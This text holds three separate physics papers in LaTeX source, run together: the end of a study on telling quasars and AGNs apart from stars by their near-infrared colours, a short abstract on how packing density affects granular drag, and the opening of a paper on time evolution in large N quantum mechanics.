the reddening vector taken from \citet{Rieke1985-ApJ} are also shown.
\label{CCD1}}
\end{figure*}
\fi
\begin{figure*}[tbp]
\begin{center}
\begin{tabular}{cc}
(a) & (b) \\
\resizebox{50mm}{!}{\includegraphics[]{figure/qso_agn12-ccd-0z1.eps}} &
\resizebox{50mm}{!}{\includegraphics[]{figure/sdss_qso-ccd-0z1.eps}} \\
\resizebox{50mm}{!}{\includegraphics[]{figure/qso_agn12-ccd-1z2.eps}} &
\resizebox{50mm}{!}{\includegraphics[]{figure/sdss_qso-ccd-1z2.eps}} \\
\resizebox{50mm}{!}{\includegraphics[]{figure/qso_agn12-ccd-2z3.eps}} &
\resizebox{50mm}{!}{\includegraphics[]{figure/sdss_qso-ccd-2z3.eps}} \\
\resizebox{50mm}{!}{\includegraphics[]{figure/qso_agn12-ccd-3z4.eps}} &
\resizebox{50mm}{!}{\includegraphics[]{figure/sdss_qso-ccd-3z4.eps}} \\
\resizebox{50mm}{!}{\includegraphics[]{figure/qso_agn12-ccd-4z5.eps}} &
\resizebox{50mm}{!}{\includegraphics[]{figure/sdss_qso-ccd-4z5.eps}} \\
\end{tabular}
\caption{(a) The distribution of AGNs in the QA catalogue.
(b) The distribution of quasars in the SQ catalogue.
The stellar locus \citep{Bessell1988-PASP}, the CTTS locus \citep{Meyer1997-AJ}, and
the reddening vector taken from \citet{Rieke1985-ApJ} are also shown.
\label{CCD1}}
\end{center}
\end{figure*}
\section{Data}\label{Data}
We examine the near-infrared properties of quasars/AGNs using 2MASS magnitudes.
The samples of quasars/AGNs are extracted from
Sloan Digital Sky Survey Data Release 5 (SDSS-DR5) quasar catalog and
Quasars and Active Galactic Nuclei (12th Ed. )
and these catalogues are briefly introduced below.
\subsection{2MASS}
The Two Micron All Sky Survey \citep[2MASS
\footnote{2MASS web site (http://www.ipac.caltech.edu/2mass/)}; ][]{Skrutskie2006-AJ}
is a project which observed 99.998\% of the whole sky
at the J (1.25 $\mu$m), H (1.65 $\mu$m), Ks (2.16 $\mu$m) bands,
at Mt. Hopkins, AZ (the Northern Hemisphere) and at CTIO, Chile (the Southern Hemisphere)
between June 1997 and February 2001.
The instruments are both highly automated 1.3-m telescopes equipped with three-channel cameras,
each channel consisting of a 256 $\times$ 256 array of HgCdTe detectors.
The 2MASS obtained 4 121 439 FITS images (pixel size $\sim2''_{\cdot}0$) with 7.8 s of integration time.
The $10 \sigma$ point-source detection levels are better than 15.8, 15.1, and 14.3 mag
at J, H, and K$_\textnormal{\tiny S}$ bands.
The Point Source Catalogue (PSC) was produced using these images and catalogued 470 992 970 sources.
In the 2MASS web site, the images and the PSC are open to the public and are easily available.
\begin{table*}[tbp]
\begin{center}
\begin{tabular}{crrrrrr}
\hline \hline
redshift & \multicolumn{3}{c}{QA catalogue} & \multicolumn{3}{c}{SQ catalogue} \\
range & \multicolumn{3}{c}{-----------------------------------} & \multicolumn{3}{c}{-----------------------------------} \\
& Region I & Region II & total & Region I & Region II & total \\ \hline
$0 \leq z \leq 1$ & 1 671 (27) & 4 480 (73) & 6 151 & 222 (11) & 1 869 (89) & 2 091 \\
$1 < z \leq 2$ & 238 (47) & 265 (53) & 503 & 222 (47) & 249 (53) & 471 \\
$2 < z \leq 3$ & 67 (25) & 197 (75) & 264 & 38 (19) & 165 (81) & 203 \\
$3 < z \leq 4$ & 7 (16) & 36 (84) & 43 & 9 (18) & 41 (82) & 50 \\
$4 < z \leq 5$ & 5 (71) & 2 (29) & 7 & 1 (50) & 1 (50) & 2 \\ \hline
total & 1 998 (29) & 4 970 (71) & 6 968 & 500 (18) & 2 317 (82) & 2 817 \\ \hline
\end{tabular}
\caption{
The number of objects distributed in the Region I and II.
Of 7 061 AGNs detected in the QA catalogue,
93 do not have a measured redshift. The values in parentheses represent percentages of quasars/AGNs residing in each region.
\label{Ratio}}
\end{center}
\end{table*}
\subsection{SDSS-DR5 quasar catalog}
The Sloan Digital Sky Survey (SDSS)
provides a photometrically and astrometrically
calibrated digital imaging survey of $\pi$ sr above Galactic latitude $30^\circ$
in five broad optical bands to a depth of $g' \sim 23$ mag \citep{York2000-AJ}.
Many astronomical catalogues have been produced by this survey.
The SDSS quasar catalog IV \citep[][hereafter SQ]{Schneider2007-AJ} is
the forth edition of the SDSS quasar catalog I \citep{Schneider2002-AJ},
which is made from the SDSS Fifth Data Release \citep{Adelman2007-ApJS}.
The SQ catalogue consists of 77 429 quasars,
the vast majority of which were discovered by the SDSS.
The area covered by the catalogue is $\approx 5740$ deg$^2$.
The quasar redshifts range from 0.08 to 5.41, with a median value of 1.48.
The positional accuracy of each object is better than $0_\cdot''2$.
\subsection{Quasars and Active Galactic Nuclei (12th Ed.)}
The catalogue of Quasars and Active Galactic Nuclei (12th Ed.) \citep[][hereafter QA]{Veron2006-AA} is
the 12th edition of the catalogue of quasars first published in 1971 by De Veny et al.. The QA catalogue contains 85 221 quasars, 1 122 BL Lac objects and
21 737 active galaxies (including 9 628 Seyfert 1).
this catalogue includes position and redshift as well as optical brightness (U, B, V) and 6 cm and 20 cm flux densities when available.
The positional accuracy is better than $1_\cdot''0$.
\section{Near-infrared properties of AGNs}\label{Properties}
\subsection{Extraction of Near-infrared counterpart}
The sources in two of the above-mentioned AGN catalogues (SQ and QA)
were cross-identified with 2MASS PSC,
and we extracted a near-infrared counterpart of each source.
As mentioned in the previous section,
the positional accuracies in both catalogues are better than $1''$.
Therefore, we identified an near-infrared counterpart
when a 2MASS source is located within $1''$ of a SQ/QA position.
As a result of the extraction,
we have derived 9 658 (SQ catalogue) and 14 078 (QA catalogue)
near-infrared counterparts.
For investigating the near-infrared properties using 2MASS magnitudes,
we used only 2 817 (SQ) and 7 061 (QA) objects where 2MASS photometric quality flags are
better than B (signal-to-noise ratio (S/N) $>7\sigma$).
\subsection{Colour-colour diagram}
Near-infrared ($H-K_\textnormal{\tiny S}$)-($J-H$) CCD is
a powerful tool to investigate the property of celestial objects.
We investigated the near-infrared properties of quasars/AGNs using near-infrared CCD.
Figure \ref{CCD1} shows the distributions of quasars/AGNs in a ($H-K_\textnormal{\tiny S}$)-($J-H$) CCD.
In previous studies, the intrinsic loci of stars and Classical T Tauri Stars (CTTS)
were well defined by \citet{Bessell1988-PASP} and \citet{Meyer1997-AJ}.
Their loci are also shown in the CCD.
\citet{Bessell1988-PASP} and the Caltech (CIT) systems are transformed into the 2MASS photometric system
by the method introduced by \citet{Carpenter2001-AJ}.
The reddening vector, taken from \citet{Rieke1985-ApJ}, is also shown in the diagram.
Because the stellar and CTTS loci can only shift along the reddening vector,
most of these types of stars fundamentally should not be located in the region described by the following equations.
\begin{eqnarray}
(J-H) \leq 1.70(H-K_\textnormal{\tiny S})-0.118 \label{Star}\\
(J-H) \leq 0.61 (H-K_\textnormal{\tiny S})+0.50 \label{CTTS}
\end{eqnarray}
Equation (\ref{Star}) represents the lower limit line where normal stars can reside and
Equation (\ref{CTTS}) represents the lower limit line where CTTS can reside.
Both lines are also shown in Fig. \ref{CCD1}.
Below, we call the region enclosed by Equations (\ref{Star}) and (\ref{CTTS}) ``Region II''
and all other regions ``Region I''.
In Fig. \ref{CCD1}, we can see that most of the quasar/AGNs
are located in clearly different areas than the stellar loci.
The distributions of the quasar/AGNs are on the right side of the stellar loci in the CCD,
i.e., they have a $(J-H)$ colour similar to that of normal stars
but have a $(H-K_\textnormal{\tiny S})$ colour redder than that of normal stars.
Table \ref{Ratio} counts the number of objects in each region.
It shows that 70\% of AGNs and 80\% of quasars are distributed in Region II.
Hence, the near-infrared selection of quasars can be more effective than that of other types of AGN.
Especially, $\sim 90\%$ of low redshift quasars with $0 \leq z \leq 1$ reside in Region II,
so these quasars are rarely missed.
However, objects with $1< z \leq 2$ or $4<z \leq 5$ tend to have a bluer colour in $(H-K_\textnormal{\tiny S})$
than objects with other redshift ranges, which is similar to the colour of normal stars.
Therefore, some of these quasars/AGNs might be missed.
The difference of the loci between quasars/AGNs and normal stars is
probably due to the difference of the radiation mechanism
because the dominant radiation of quasars/AGNs is not blackbody radiation.
This colour property is considered to be caused by K-excess \citep{Warren2000-MNRAS}.
They proposed a $KX$ method where quasars with a ($V-J$) colour similar to
that of stars would be redder in ($J-K$) colour.
In other words, this $KX$ method can separate quasars and stars on the basis of their colours.
This technique has been used for selecting quasar candidates
\citep[e.g., ][]{Smail2008-MNRAS,Jurek2008-MNRAS,Nakos2009-AA}.
The present work is a variant of the original $KX$ technique,
using the $(J-H)$ versus $(H-K_\textnormal{\tiny S})$ diagram.
\subsection{Colours versus redshift}
\begin{figure}[tbp]
\begin{center}
\resizebox{90mm}{!}{\includegraphics[clip]{figure/sdss-z-color.eps}}
\end{center}
\caption{Colours versus redshift for SDSS quasars.
The redshifts are taken from the SQ catalogue.
The red solid lines show the average colour evolutions with respect to redshift.
\label{Z-Colours}}
\end{figure}
In Fig. \ref{Z-Colours}, we plot the SDSS quasars, in three colours versus redshift
together with average colour evolutions with respect to redshift.
The redshifts are taken from the SQ catalogue.
Each colour undergoes only a small change or dispersion with redshift.
This is probably due to a variety of spectral shapes and/or a variety of extinctions.
In the near-infrared CCD, this small colour change causes a small difference of AGN locus.
These properties can be reproduced by the simulation as mentioned below.
\section{Simulating the near-infrared colours of quasars}\label{Simulation}
\if2
\begin{figure}[tbp]
\begin{center}
\resizebox{90mm}{!}{\includegraphics[clip]{figure/z-color-simulation.eps}}
\end{center}
\caption{Colours versus redshift for SDSS quasars.
\label{}}
\end{figure}
\fi
\begin{figure*}[tbp]
\begin{center}
\resizebox{90mm}{!}{\includegraphics[clip]{figure/z-color-simulation.eps}}
\resizebox{90mm}{!}{\includegraphics[clip]{figure/z-color-sdss-simulate2b.eps}}
\caption{Simulated colours versus redshift.
The curves represent the simulated colour evolutions
with $A_\textnormal{\tiny V}=0,1,2,3,4$ (from bottom to top), respectively.
The SDSS quasars (left panel) and the average colour evolution (right panel)
shown in Fig. \ref{Z-Colours} are also plotted in the diagram.
\label{Z-Simulated-Colours}}
\end{center}
\end{figure*}
\begin{figure}[tbp]
\begin{center}
\resizebox{90mm}{!}{\includegraphics[clip]{figure/ccd-simulation2-b.eps}}
\end{center}
\caption{Simulated colour evolution with respect to redshift in the ($H-K_\textnormal{\tiny S}$)-($J-H$) diagram.
The stellar locus and the reddening vector are also shown in the diagram,
which are same as in Fig. \ref{CCD1} .
\label{CCD-Simulation}}
\end{figure}
\begin{table}[tbp]
\begin{center}
\begin{tabular}{crrr}
\hline \hline
$A_\textnormal{\tiny V}$ & $J-K_\textnormal{\tiny S}$ & $J-H$ & $H-K_\textnormal{\tiny S}$ \\ \hline
0 & 0.78 (0) & 0.94 (0) & 0.86 (0) \\
1 & 0.94 (0) & 0.69 (0) & 0.60 (0) \\
2 & 0.26 (17) & 0.29 (9) & 0.14 (84) \\
3 & 0.79 (0) & 0.82 (0) & 0.59 (0) \\
4 & 1.0 (0) & 1.0 (0) & 0.88 (0) \\ \hline
\end{tabular}
\caption{
Results of a KS test between average colour evolution and simulated colour evolution.
The decimal values represent KS distance between two data and
the values in parentheses represent significance level (percentage) for each KS test.
\label{KS-test}}
\end{center}
\end{table}
In this section,
we demonstrate that the locus of quasars is well separated from that of normal stars
on the basis of a simulation using a realistic SED of quasars.
In order to simulate the near-infrared colours of quasars,
we performed a Monte-Carlo simulation with Hyperz code \citep{Bolzonella2000-AA}.
The Hyperz code can calculate photometric redshift based on an inputted spectral template library,
which finds the best fit SED by minimizing the $\chi^2$ derived from
the comparison among the observed SED and expected SEDs.
The reddening effects are taken into account according to a selected reddening law.
Although this code is usually used for estimating photometric redshifts,
we use it to derive the near-infrared colours at various redshifts.
First, we made a magnitude list containing randomly generated J, H, K$_\textnormal{\tiny S}$ magnitudes,
ranging from 8 to 16 mag (roughly coincident with a reliable range of 2MASS magnitude)
and produced 100 000 data sets.
These data sets were subjected to
SED fittings using the Hyperz code.
A realistic SED of quasars was taken from \citet{Polletta2007-ApJ}
(i.e., QSO1 in \citet{Polletta2007-ApJ} are used).
According to \citet{Polletta2007-ApJ},
the SED of the QSO1 is derived by combining the SDSS quasar composite spectrum
and rest-frame IR data of a sample of 3 SDSS/SWIRE quasars \citep{Hatziminaoglou2005-AJ}.
We used the reddening law from \citet{Calzetti2000-ApJ}, which is prepared by default in Hyperz code. Inputting the data sets into the Hyperz code,
we derived photometric redshifts with the probabilities associated with the value of $\chi^2$.
We only used objects having probabilities of $\geq 99\%$.
Figure \ref{Z-Simulated-Colours} shows the simulated colour evolutions with respect to redshift.
The curves in each diagram represent the simulated colours
with $A_\textnormal{\tiny V} =0$, 1, 2, 3, 4 (from bottom to top), respectively.
To find the best fits for the average colour curves,
we performed Kolmogorov-Smirnov (KS) tests between average colour curves and each simulated colour curve.
Table \ref{KS-test} shows the result of the KS tests.
In all three colours, the colour evolution with $A_\textnormal{\tiny V}=2$ is
the best fit among five $A_\textnormal{\tiny V}$ values.
In addition, the redshift-colour relations of SQ quasars can be roughly reproduced
by simulated curves with $0\lesssim A_\textnormal{\tiny V} \lesssim 3$.
A variety of extinctions probably generate the dispersion of the colours.
It should be noted that both ($J-H$) and ($J-K_\textnormal{\tiny S}$) colours steeply
increase over $z\sim 9$.
This is due to shifting the Lyman break over the J-band wavelength.
This property can be useful for extracting high-redshift quasars.
In Fig. \ref{CCD-Simulation}, the simulated colours with $A_\textnormal{\tiny V}=2$ are shown
in the ($H-K_\textnormal{\tiny S}$)-($J-H$) CCD, tracked by redshift evolution.
An important point is that the simulated position is well separated from the stellar locus,
that is, it is consistent with the loci of quasars/AGNs shown in Fig. \ref{CCD1}.
A variety of extinctions causes the dispersion of the simulated position and
this can probably reproduce the dispersion of the loci of quasars/AGNs in Fig. \ref{CCD1}.
It is also consistent with the fact that
the quasars with $0 \leq z \leq 1$ have relatively redder colour in ($H-K_\textnormal{\tiny S}$) compared with
the quasars with $1 \leq z \leq$ 2.
Although it is difficult to distinguish high-redshift quasars among $z\lesssim 8$,
we can extract high-redshift quasar candidates with $z \gtrsim 8$
on the basis of a ($H-K_\textnormal{\tiny S}$)-($J-H$) diagram
because the ($J-H$) colour steeply increases over $z \sim 8$.
\section{Discussion}\label{Discussion}
\subsection{Other probable objects} \label{Probabilities}
\begin{figure*}[tbp]
\begin{tabular}{cc}
(a) & (b) \\
\begin{minipage}[htbp]{0.5\textwidth}
\begin{center}
\resizebox{80mm}{!}{\includegraphics[clip]{figure/mqso-hk-jh.eps}}
\end{center}
\end{minipage}
&
\begin{minipage}[htbp]{0.5\textwidth}
\begin{center}
\resizebox{80mm}{!}{\includegraphics[clip]{figure/cv2009-hk-jh.eps}}
\end{center}
\end{minipage} \\
(c) & (d) \\
\begin{minipage}[htbp]{0.5\textwidth}
\begin{center}
\resizebox{80mm}{!}{\includegraphics[clip]{figure/lmxb-hk-jh.eps}}
\end{center}
\end{minipage}
&
\begin{minipage}[htbp]{0.5\textwidth}
\begin{center}
\resizebox{80mm}{!}{\includegraphics[clip]{figure/cmyso-hk-jh.eps}}
\end{center}
\end{minipage}\end{tabular}
\caption{The distribution of four types of objects: Microquasars (upper left),
Cataclysmic variables (upper right), Low Mass X-ray Binaries (lower left),
and Massive Young Stellar Objects (lower right).
The stellar locus and the reddening vector are same as in Fig. \ref{CCD1}.
\label{CCD2}}
\end{figure*}
\begin{table}[tbp]
\begin{center}
\begin{tabular}{rrrrr}
\hline \hline
& Microquasars & CV & LMXB & MYSO \\ \hline
I & 16 (84) & 245 (75) & 11 (73) & 27 (93) \\
II & 3 (16) & 82 (25) & 4 (27) & 2 (7) \\
total & 19 & 327 & 15 & 29 \\ \hline
\end{tabular}
\caption{
The number and percentage of objects distributed in each region.
The values in parentheses represent percentage.
\label{ratio-four-objects}}
\end{center}
\end{table}
Although the locus of AGNs in the near-infrared CCD is different from that of normal stars,
other types of objects might be distributed in the locus
with similar properties to AGNs.
If a position in the CCD depends on the radiation mechanism,
other objects with radiation mechanism similar to AGNs are also expected to be located at the same position.
Below, we further examine the loci of four types of objects which have non-thermal radiation or
which are considered to be bright in both near-infrared and X-ray wavelengths:
Microquasars, Cataclysmic Variables (CVs), Low Mass X-ray Binaries (LMXBs), and
Massive Young Stellar Objects (MYSOs).
Sample objects are extracted from three catalogues, namely
Microquasar Candidates \citep[Microquasars; ][]{Combi2008-AA}
Cataclysmic Binaries, LMXBs, and related objects \citep[CVs and LMXBs; ][]{Ritter2003-AA},
and Catalogue of massive young stellar objects \citep[MYSOs; ][]{Chan1996-AAS}.
First, we cross-identified each catalogue with 2MASS PSC, and
extracted the near-infrared counterparts.
\citet{Combi2008-AA} have cross-identified their catalogue with the 2MASS catalogue
by adopting a cross-identification of $4''$.
The positional accuracy in Ritter \& Kolb catalogue are $\sim 1''$ \citep{Ritter2003-catalogue}.
The objects in the MYSO catalogue were selected from the Infrared Astronomical Satellite (IRAS) PSC
whose typical position uncertainties are about $2''$ to $6''$ \citep{Beichman1988-IRAS,Helou1988-IRAS}.
Therefore, we set positional criteria for the cross-identification
to $\leq 2''$ (CV and LMXB catalogues) and $\leq 4''$ (Microquasar and MYSO catalogues).
We used objects with a 2MASS photometric quality better than B (i.e., S/N $> 7\sigma$).
Using 2MASS magnitude, they were plotted in a ($H-K_\textnormal{\tiny S}$)-($J-H$) diagram.
Figure \ref{CCD2} shows the CCD of each object.
In every case, a few objects are distributed around the locus of the AGNs,
although most of the objects are distributed around the stellar locus
or reddened region from the stellar locus.
Table \ref{ratio-four-objects} lists the number and percentage of objects distributed in each region.
Although the ratios of CVs and LMXBs residing in Region II are relatively larger than the other two types of objects,
it is not more than $\sim 25\%$.
In addition, few objects have $(H-K_\textnormal{\tiny S}) \sim 0.8$ in Region II
though most quasars/AGNs have this colour (see Fig. \ref{CCD1}).
Accordingly, contamination by these four types of objects should be a small fraction.
This means that the dominant radiation of the four objects should be thermal radiation.
The AGNs also radiate thermal radiation,
but it is a very small fraction compared with the non-thermal component produced
by accretion around supermassive black holes.
Therefore, AGNs should be well separated by these four objects using the near-infrared colours.
\subsection{Contamination by normal galaxies}
\begin{figure}[thbp]
\begin{center}
\resizebox{90mm}{!}{\includegraphics[clip]{figure/ccd-simulation-ngalaxy-0z3.eps}}
\end{center}
\caption{
Simulated colour evolutions for seven spiral galaxies.
Redshift ranges from 0.0 to 3.0 with $\Delta z=0.2$ interval points.
The boundary between Region I and II is also drawn in the diagram.
\label{Simulate-galaxy-colour}}
\end{figure}
Distant galaxies that appear as point-like sources might
contaminate the AGN locus in the near-infrared CCD.
We confirmed the locus of normal galaxies in the near-infrared CCD
by performing a Monte-Carlo simulation as in Sect. \ref{Simulation}.
The SED templates we used are seven spiral galaxies in \citet{Polletta2007-ApJ}:
spirals range from early to late types (S0-Sd).
Figure \ref{Simulate-galaxy-colour} shows the simulated intrinsic colours
(i.e., $A_\textnormal{\tiny V}=0$) of the seven galaxies.
Galaxies with $0\leq z\lesssim 0.8$ have intrinsic colours similar to those of normal stars
(i.e., they are in Region I).
Galaxies with $1.4 \lesssim z \leq 3$ are distributed
around the reddened region of either normal stars and/or CTTS.
Therefore, they should not be mistaken for AGN candidates.
On the other hand, simulated colours with $z \sim 1$ are located in Region II.
A fraction of AGN in Region II are possibly mistaken for galaxies with $z\sim 1$.
However, galaxies at $z\sim 1$ should not have enough brightness to be detected with mid-scale telescopes.
Even the brightest galaxy has no more than $M \sim -23$ mag at SDSS r-band \citep{Blanton2001-AJ,Baldry2004-ApJ}.
If such a galaxy were located at $z\sim 1$,
its apparent magnitude would be $m \gtrsim 20$ mag at J-band.
In addition, the apparent magnitude would be even fainter
because most galaxies have $M>-23$ mag and the apparent brightness suffers extinction.
Accordingly, only large-scale telescopes can observe these galaxies.
Hence, few galaxies should contaminate the AGN locus in the near-infrared CCD with respect to
the data where limiting magnitude is below 20 mag.
\section{Summary and Conclusion}
We confirmed the loci of catalogued quasars/AGNs in a ($H-K_\textnormal{\tiny S}$)-($J-H$) diagram,
of which over $70 \sim 80\%$ are clearly separated from the stellar locus.
In addition,
we simulated the near-infrared colours of quasars on the basis of a Monte-Carlo simulation with Hyperz code,
and demonstrated that the simulated colours can reproduce both the redshift-colour relations and
the locus of quasars in the near-infrared CCD.
We also predicted the colour evolution with respect to redshift (up to $z \sim 11$).
Finally, we discussed the possibility of contamination by other types of objects.
The locus of AGNs is also different from those of
the other four probable types of objects (namely, Microquasars, CVs, LMXBs, MYSOs)
that are expected to be located at a similar locus.
We also demonstrated by a Monte-Carlo simulation
that normal galaxies are unlikely to contaminate the locus of AGNs in the near-infrared CCD.
\citet{Hewett2006-MNRAS} investigated near-infrared colours of quasars using an artificial SED,
but we proposed near-infrared colour selection criteria for extracting AGNs and
studied both observed and simulated colours with quantitative discussions.
An important point is that our selection criteria require only near-infrared photometric data,
although some previous studies \citep[e.g., ][]{Glikman2007-ApJ,Glikman2008-AJ} used colour selections
based on colours between near-infrared and optical wavelengths.
In other words, our selection criteria make extraction of candidates easier
because only near-infrared colours are needed.
This technique should also be useful when we search for high-redshift quasars,
since they become very faint in the optical wavelength due to the shift of Lyman break.
This paper demonstrates that near-infrared colours can be useful to select AGN candidates.
If an additional constraint is imposed, more reliable candidates can be extracted.
When we use the near-infrared colour selection with an additional constraint
for near-infrared catalogues containing sources distributed in large area
(e.g., 2MASS, DENIS, UKIDSS, and future surveys),
a lot of AGN samples (possibly over $\sim$10 000) are expected to be derived in a region over $\sim$10 000 deg$^2$. \citet{Kouzuma2009-prep} \citep[see also][]{Kouzuma2009-ASPC} cross-identified between the 2MASS and ROSAT catalogues, and
extracted AGN candidates in the entire sky using the near-infrared colour selection in this paper.
These large number of samples may provide us with clues about such as the evolution of AGNs and X-ray background.
Additionally, in our simulation, quasars with $z \gtrsim 8$ can be extracted on the basis of near-infrared colours.
This property might be helpful to search for high-redshift quasars in the future.
\begin{acknowledgements}
This publication makes use of data products from the Two Micron All Sky Survey,
which is a joint project of the University of Massachusetts and
the Infrared Processing and Analysis Center/California Institute of Technology,
funded by the National Aeronautics and Space Administration and the National Science Foundation.
Funding for the SDSS and SDSS-II has been provided by the Alfred P. Sloan Foundation,
the Participating Institutions, the National Science Foundation, the U.S. Department of Energy,
the National Aeronautics and Space Administration, the Japanese Monbukagakusho,
the Max Planck Society, and the Higher Education Funding Council for England.
The SDSS Web Site is http://www.sdss.org/.
We thank the anonymous referee for useful comments to improve this paper.
\end{acknowledgements}
\bibliographystyle{aa}
| 2024-02-18T23:40:04.872Z | 2009-10-20T13:34:00.000Z | algebraic_stack_train_0000 | 1,266 | 4,711 |
|
proofpile-arXiv_065-6288 | \section{Summary}
Monodisperse packings of dry, air-fluidized granular media typically exist between volume fractions from $\Phi$= 0.585 to 0.64. We demonstrate that the dynamics of granular drag are sensitive to volume fraction $\Phi$ and their exists a transition in the drag force and material deformation from smooth to oscillatory at a critical volume fraction $\Phi_{c}=0.605$. By dragging a submerged steel plate (3.81 cm width, 6.98 cm depth) through $300 \mu m$ glass beads prepared at volume fractions between 0.585 to 0.635 we find that below $\Phi_{c}$ the media deformation is smooth and non-localized while above $\Phi_{c}$ media fails along distinct shear bands. At high $\Phi$ the generation of these shear bands is periodic resulting in the ripples on the surface. Work funded by The Burroughs Wellcome Fund and the Army Research Lab MAST CTA
\end{document} | 2024-02-18T23:40:05.101Z | 2009-10-17T00:38:07.000Z | algebraic_stack_train_0000 | 1,278 | 151 |
|
proofpile-arXiv_065-6309 | \section{Introduction}
Evolutionary processes have been studied in the framework of Quantum
Mechanics from its early days. Even the first complete formulation
of principles of Quantum Mechanics described a way to find a time
dependence of observables (Heisenberg eqs). In Quantum Field Theory
the common lore concerns mainly properties of vacua and
perturbations around them. Still, time dependent processes are
crucial in various branches of QFT (inflationary cosmology, QFT in
curved spaces etc). These processes include a rolling of a quantum
field from a maximum of a potential, oscillations around a minimum
and a tunneling from one minimum of a potential to others.
In general, a study of time-dependent processes in QFT is
prohibitively difficult. It can be carried out, however, in large
$N$ vector models.
A large $N$ vector model with a global $O(N)$ symmetry is a rare
example of a field theory where an exact vacuum state can be found
(for a review of large $N$ models see \cite{Moshe:2003xn}). This
model has served as a toy model for various problems common in QFT.
A three-dimensional scale-invariant model was shown to be quantumly
conformal \cite{Bardeen:1983rv} and to possess a non-trivial phase
structure \cite{Bardeen:1983st}.
General eqs. which govern time-dependent processes in the large $N$
vector model were suggested in \cite{Asnin:2009bs} and applied there
to the case of $d=3$. The applications included an exact rolling
solution of a $\phi^6$ model with vanishing energy and an
approximate solutions for oscillations around minima in a general
potential. In all cases the quantum processes were found to occur
faster than their classical counterparts, signalizing a presence of
terms with time derivatives in addition to a known correction to a
classical potential. A possible tunneling in the model was also
studied and the tunneling amplitude was found to be larger than in
the semiclassical computation.
The main difficulty in solving for time dependent processes in the
large $N$ model, as discussed in \cite{Asnin:2009bs}, is a necessity
to find a Green's function of a differential operator which itself
contains an unknown function. In this paper we show that this
problem can be solved in the case of $d=1$, which corresponds to a
large $N$ quantum mechanics.
A large $N$ quantum mechanics has been studied from various point of
view. Numerous approximations have been used in order to derive
systematically a $1/N$ expansion (for a review and a comparison of
some approximation technics see \cite{Mihaila:2000sr}, in
\cite{Ryzhov:2000fy} yet another approach is suggested). A
supersymmetric version of the large $N$ quantum mechanics was also
studied (for improvements that supersymmetry brings to the large $N$
expansion see \cite{Cooper:1994eh}). A certain supersymmetric
version of the large $N$ quantum mechanics was proposed as a
description of a D-brane probe in the bubbling supertubes
\cite{Imamura:2005nx}.
In this paper we solve EOM's derived in \cite{Asnin:2009bs} for the
quantum mechanics in the case of unbroken global $O(N)$ symmetry. We
show that the expectation value of the quantum field changes in time
according to a classical EOM with a modified potential, which means
that the effective action in this case does not involve any
corrections to the kinetic term, the only correction being therefore
that to the potential. All characteristics of the motion (like
frequencies of oscillations around minima of the effective potential
and rolling times in that potential, and possible types of the
motion in general) can be derived by means of the classical
mechanics. In addition, a tunneling is completely suppressed.
The paper is organized as follows. In section \ref{useful_formulas}
we review the large $N$ models in general and introduce eqs. that
govern a time evolution of the quantum system. In section
\ref{Classical_analysis} we rewrite a classical EOM in a form which
is convenient for a comparison with the quantum case. In section
\ref{Quantum_case} we solve the quantum EOM's. Section \ref{Summary}
is a summary of the results. We end up with an appendix
\ref{Tunneling} where we show that there is no tunneling in the
system in the limit $N\to\infty$ and confirm this result by
conventional methods of quantum mechanics.
\section{Scalar model in the large N limit - A review}\label{useful_formulas}
Let us consider an $O(N)$-symmetric Euclidean action for an $N$ -
component scalar field $\vec{\phi}$ in $d$ space-time dimensions
\begin{equation}
S\left( \vec{\phi}\right) =\int \left[ \frac{1}{2}\left(
\partial _{\mu }\vec{\phi}\right) ^{2}+NU\left( \frac{
\vec{\phi}^{2}}{N}\right) \right] d^{d}x \, .\label{scalaraction}
\end{equation} The potential has a Taylor expansion of the form \begin{equation} U\left(
\frac{\vec{\phi}^{2}}{N}\right)
=\sum_{n=1}^{\infty}\frac{g_{2n}}{2n}\left(
\frac{\vec{\phi}^{2}}{N}\right) ^{n} \, ,
\label{ExampleOfPotential}\end{equation} with $g_{2n}$ kept fixed as
$N\to\infty $. The corresponding partition function is \begin{equation} Z=\int
D\vec{\phi}\,e^{-S(\vec{\phi})}\, . \end{equation} In order to use the fact
that $\vec{\phi}$ has many components insert the following
representation of unity into $Z$:
\begin{equation} 1\sim\int D\rho\, \delta (\vec{\phi}^{2}-N\rho)\sim \int D\rho
D\lambda\, e^{-i\int \frac{\lambda}{2}(\vec{\phi} ^{2}-N\rho
)d^{d}x}\, . \label{identity} \end{equation} Now one can integrate over
$\vec{\phi}$ and obtain \begin{equation} Z= \int D\rho D\lambda\,
e^{-N S_{eff}(\rho,\,\lambda) }\, ,
\label{partition} \end{equation} where
\begin {equation}
S_{eff}(\rho,\lambda)=\frac{1}{2}\int\left[2U(\rho) -i\lambda\rho\right]d^{d}x
+\frac{1}{2}Tr\ln \left( -\square +i\lambda \right) \, .
\label{Seff}
\end{equation}
When $N$ is large, this form of the path integral suggests to use
the saddle point method to calculate the integral. The two saddle
point equations obtained by varying the auxiliary fields $\rho$ and
$\lambda $ are\footnote{We use here the definition $Tr=\int
d^Dx\,tr$}
\begin{equation} 2U'(\rho)=i\lambda,\qquad \rho=tr\frac{1}{-\square+i\lambda}\, ,
\label{scalar_gap} \end{equation}
This form of the saddle point equations is convenient in the case of
constant fields. These constant solutions can be found as extrema of
the effective potential \begin{equation}
U_{eff}(\rho)=U(\rho)+\frac{2-d}{2\,d}\,\Gamma\left(1-\frac
d2\right)^{-\frac{2}{d-2}}\,\left(4\pi\rho\right)^{\frac{d}{d-2}}\,
,\label{Effective_Potential}\end{equation} together with the following value of
the field $\lambda$: \begin{equation}
i\lambda=\left[\frac{(4\pi)^{d/2}\rho}{\Gamma\left(1-\frac
d2\right)}\right]^{\frac{2}{d-2}}\,.\end{equation} The necessity of the second
term in (\ref{Effective_Potential}) is most clearly seen in $d=1$,
where the theory becomes a quantum mechanics. In this case the
effective potential is \begin{equation} U_{eff}(\rho)\Bigl|_{d=1}=
U(\rho)+\frac{1}{8\rho}\,.\label{1d_eff_potential}\end{equation} Then, consider
the case of $U=\frac{g_2}{2}\rho$, which corresponds to a system of
$N$ decoupled harmonic oscillators. The last term in
(\ref{Effective_Potential}) shifts a minimum of the potential from
$\rho=0$ to a correct value $\rho=\frac{1}{2\sqrt{g_2}}$. Therefore
this term takes into account a spreading of the ground state wave
function.
If the fields are not constant then, as shown in
\cite{Asnin:2009bs}, the correct form of the equations is \begin{equation}
2U'\bigl(\rho(x)\bigr)=i\lambda(x),\qquad \rho(x)=G(x,x),\qquad
\Bigl(-\Box_x+i\lambda(x)\Bigr)\,G(x,y)=\delta(x-y)\,\label{General_equations}\end{equation}
where $\Box_x$ is a Laplacian w.r.t. $x$.
A major role in the above equations in played by the Green's
